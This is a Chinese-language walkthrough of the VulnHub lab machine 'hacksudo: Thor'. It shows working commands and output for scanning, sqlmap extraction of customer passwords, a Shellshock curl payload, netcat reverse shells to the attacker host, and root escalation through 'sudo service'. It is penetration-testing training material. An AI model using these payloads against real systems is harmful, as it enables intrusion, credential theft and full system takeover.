Hacksudo Thor
作者:jason huawen
靶機資訊
名稱:hacksudo: Thor
地址:
https://www.vulnhub.com/entry/hacksudo-thor,733/
識別目標主機IP地址
(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:19:6b:c1 1 60 PCS Systemtechnik GmbH
192.168.56.160 08:00:27:94:4e:34 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具識別目標主機的IP地址為192.168.56.160
NMAP掃描
┌──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.160 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-25 21:49 EDT
Nmap scan report for localhost (192.168.56.160)
Host is up (0.00018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 37:36:60:3e:26:ae:23:3f:e1:8b:5d:18:e7:a7:c7:ce (RSA)
| 256 34:9a:57:60:7d:66:70:d5:b5:ff:47:96:e0:36:23:75 (ECDSA)
|_ 256 ae:7d:ee:fe:1d:bc:99:4d:54:45:3d:61:16:f8:6c:87 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:94:4E:34 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.95 seconds
NMAP掃描結果顯示目標主機有2個開放埠:22(ssh)、80(http),21埠狀態為過濾
獲得Shell
──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ nikto -h http://192.168.56.160
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.160
+ Target Hostname: 192.168.56.160
+ Target Port: 80
+ Start Time: 2023-04-25 21:52:37 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2023-04-25 21:53:39 (GMT-4) (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ gobuster dir -u http://192.168.56.160 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt,.js,.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.160
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: html,sh,txt,js,bak,php
[+] Timeout: 10s
===============================================================
2023/04/25 21:54:31 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/images (Status: 301) [Size: 317] [--> http://192.168.56.160/images/]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 5357]
/contact.php (Status: 200) [Size: 4164]
/news.php (Status: 200) [Size: 8062]
/home.php (Status: 200) [Size: 5345]
/header.php (Status: 200) [Size: 472]
/connect.php (Status: 200) [Size: 0]
/navbar.php (Status: 200) [Size: 1515]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.160/fonts/]
/transactions.php (Status: 302) [Size: 8163] [--> home.php]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/customer_profile.php (Status: 302) [Size: 7274] [--> home.php]
Progress: 1540415 / 1543927 (99.77%)
Gobuster工具沒有掃描出有價值的目錄或者檔案,更換字典繼續掃描:
┌──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ gobuster dir -u http://192.168.56.160 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.sh,.txt,.js,.bak
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.160
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: sh,txt,js,bak,php,html
[+] Timeout: 10s
===============================================================
2023/04/25 21:59:22 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.160/images/]
/contact.php (Status: 200) [Size: 4164]
/news.php (Status: 200) [Size: 8062]
/home.php (Status: 200) [Size: 5345]
/index.php (Status: 200) [Size: 5357]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.160/fonts/]
/header.php (Status: 200) [Size: 472]
/connect.php (Status: 200) [Size: 0]
/server-status (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/navbar.php (Status: 200) [Size: 1515]
/transactions.php (Status: 302) [Size: 8163] [--> home.php]
/admin_login.php (Status: 200) [Size: 1511]
更換字典后,掃描出/admin_login.php檔案,接下來看如何突破用戶登錄:
首先看能否利用登錄繞開陳述句,但是沒有成功,
利用Burpsuite攔截用戶登錄請求,存盤為檔案req.txt,
─(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req.txt --level=3
___
__H__
___ ___["]_____ ___ ___ {1.6.7#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:08:45 /2023-04-25/
但是SQLMAP沒有掃描出SQL注入漏洞,在感覺不知道下一步怎么干的時候,嘗試一下另外一個目錄掃描工具dirsearch,這次有識訓:
─(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ dirsearch -u http://192.168.56.160
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/192.168.56.160/_23-04-25_22-12-41.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-04-25_22-12-41.log
dirsearch掃描出目標有/README.md檔案,訪問該檔案,好像有用戶名和密碼資訊
However some important usernames and passwords are provided below :
* Username of admin is "admin" & password is "password123".
* Username of most of the customers is their "first_name" & password is their "first_name" followed by "123".
可以成功登陸/admin_login.php
這頁是否存在SQL注入漏洞?
利用Burpsuite攔截該頁請求,存盤為檔案req2.txt,再用sqlmap掃描一下
─(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3
GET parameter 'cust_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
說明目標站點的cust_id存在SQL注入漏洞,
─(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 --dbs
available databases [4]:
[*] hacksudo
[*] information_schema
[*] mysql
[*] performance_schema
得到資料庫串列
─(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 -D hacksudo --tables
Database: hacksudo
[12 tables]
+--------------+
| admin |
| beneficiary1 |
| beneficiary2 |
| beneficiary3 |
| beneficiary4 |
| customer |
| news |
| news_body |
| passbook1 |
| passbook2 |
| passbook3 |
| passbook4 |
+--------------+
(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 -D hacksudo -T admin --columns
Database: hacksudo
Table: admin
[3 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| id | int(11) |
| pwd | char(25) |
| uname | char(25) |
+--------+----------+
這個表的資訊已經沒有價值,看一下其他表,
─(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sqlmap -r req2.txt --level=3 -D hacksudo -T customer -C uname,pwd --dump+---------+-----------+
| uname | pwd |
+---------+-----------+
| zakee94 | nafees123 |
| salman | salman123 |
| jon | snow123 |
| tushar | tushar123 |
將上述用戶名和密碼分別作為字典登錄ssh,均失敗,但注意到news.php檔案源代碼中有注釋:
<!-- cgi-bin ---!>
所以/cgi-bin/目錄下可能有cgi檔案
┌──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ dirsearch -u http://192.168.56.160/cgi-bin/ -f -e cgi
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: cgi | HTTP method: GET | Threads: 30 | Wordlist size: 13603
Output File: /home/kali/.dirsearch/reports/192.168.56.160/-cgi-bin-_23-04-25_23-25-10.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-04-25_23-25-10.log
Target: http://192.168.56.160/cgi-bin/
[23:25:10] Starting:
[23:25:12] 403 - 279B - /cgi-bin/.ht_wsr.txt
[23:25:12] 403 - 279B - /cgi-bin/.htaccess.orig
[23:25:12] 403 - 279B - /cgi-bin/.htaccess.bak1
[23:25:12] 403 - 279B - /cgi-bin/.htaccessBAK
[23:25:12] 403 - 279B - /cgi-bin/.htaccess.sample
[23:25:12] 403 - 279B - /cgi-bin/.htaccess_sc
[23:25:12] 403 - 279B - /cgi-bin/.htaccessOLD
[23:25:12] 403 - 279B - /cgi-bin/.htaccess.save
[23:25:12] 403 - 279B - /cgi-bin/.htaccessOLD2
[23:25:12] 403 - 279B - /cgi-bin/.htaccess_orig
[23:25:12] 403 - 279B - /cgi-bin/.htm
[23:25:12] 403 - 279B - /cgi-bin/.htaccess_extra
[23:25:12] 403 - 279B - /cgi-bin/.html
[23:25:12] 403 - 279B - /cgi-bin/.htpasswd_test
[23:25:12] 403 - 279B - /cgi-bin/.httr-oauth
[23:25:12] 403 - 279B - /cgi-bin/.htpasswds
[23:25:13] 403 - 279B - /cgi-bin/.php
[23:25:31] 500 - 612B - /cgi-bin/backup.cgi
可能存在破殼漏洞
──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/backup.cgi,cmd=ls 192.168.56.160
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-25 23:30 EDT
Nmap scan report for bogon (192.168.56.160)
Host is up (0.00029s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| Exploit results:
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>500 Internal Server Error</title>
| </head><body>
| <h1>Internal Server Error</h1>
| <p>The server encountered an internal error or
| misconfiguration and was unable to complete
| your request.</p>
| <p>Please contact the server administrator at
| webmaster@localhost to inform them of the time this error occurred,
| and the actions you performed just before this error.</p>
| <p>More information about this error may be available
| in the server error log.</p>
| <hr>
| <address>Apache/2.4.38 (Debian) Server at bogon Port 80</address>
| </body></html>
|
| References:
| http://seclists.org/oss-sec/2014/q3/685
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
| http://www.openwall.com/lists/oss-security/2014/09/24/10
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds
NMAP腳本掃描結果可知目標站點存在shellshock漏洞
┌──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'id'" \http://192.168.56.160/cgi-bin/backup.cgi
uid=33(www-data) gid=33(www-data) groups=33(www-data)
接下來設法得到反彈的shell
──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 192.168.56.230 5555'" http://192.168.56.160/cgi-bin/backup.cgi
┌──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.160] 49396
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.3$ cd /home
cd /home
bash-4.3$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Aug 2 2021 .
drwxr-xr-x 18 root root 4.0K Jul 29 2021 ..
drwxrwx--- 5 thor thor 4.0K Aug 2 2021 thor
bash-4.3$ cd thor
cd thor
bash: cd: thor: Permission denied
bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on HackSudoThor:
(thor) NOPASSWD: /home/thor/./hammer.sh
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key : ljgg
ljgg
Hey Dear ! I am ljgg , Please enter your Secret massage : id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
Thank you for your precious time!
發現可以輸入任意的secret key,然后在Secret message處即可執行命令,因此下一步可以spawn一個新的shell,而得到用戶thor
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh
HELLO want to talk to Thor?
Enter Thor Secret Key : ddd
ddd
Hey Dear ! I am ddd , Please enter your Secret massage : nc -e /bin/bash 192.168.56.230 6666
nc -e /bin/bash 192.168.56.230 6666
在Kali Linux上成功得到了用戶thor的shell
──(kali?kali)-[~/Desktop/Vulnhub/HacksudoThor]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.160] 42452
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
python -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/home$
提權
thor@HacksudoThor:~$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User thor may run the following commands on HackSudoThor:
(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service
thor@HacksudoThor:~$ sudo /usr/sbin/service ../../bin/sh
sudo /usr/sbin/service ../../bin/sh
# cd /root
cd /root
# ls -alh
ls -alh
total 64K
drwx------ 6 root root 4.0K Jul 30 2021 .
drwxr-xr-x 18 root root 4.0K Jul 29 2021 ..
-rw------- 1 root root 302 Aug 2 2021 .bash_history
-rw-r--r-- 1 root root 598 Jun 24 2021 .bashrc
drwxr-xr-x 3 root root 4.0K Jun 24 2021 .cache
drwx------ 3 root root 4.0K Jun 11 2021 .gnupg
-rw------- 1 root root 28 Jun 24 2021 .lesshst
drwxr-xr-x 3 root root 4.0K Jun 11 2021 .local
-rw------- 1 root root 2.4K Jul 30 2021 .mysql_history
-rw-r--r-- 1 root root 144 Jun 23 2021 .pearrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Aug 2 2021 .ssh
-rw-r--r-- 1 root root 493 Jun 15 2021 .wget-hsts
-rw-r--r-- 1 root root 7.0K Jul 30 2021 proof.txt
-rw------- 1 root root 7 Aug 2 2021 root.txt
# cat root.txt
cat root.txt
rooted
#
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/551291.html
標籤:其他
下一篇:返回列表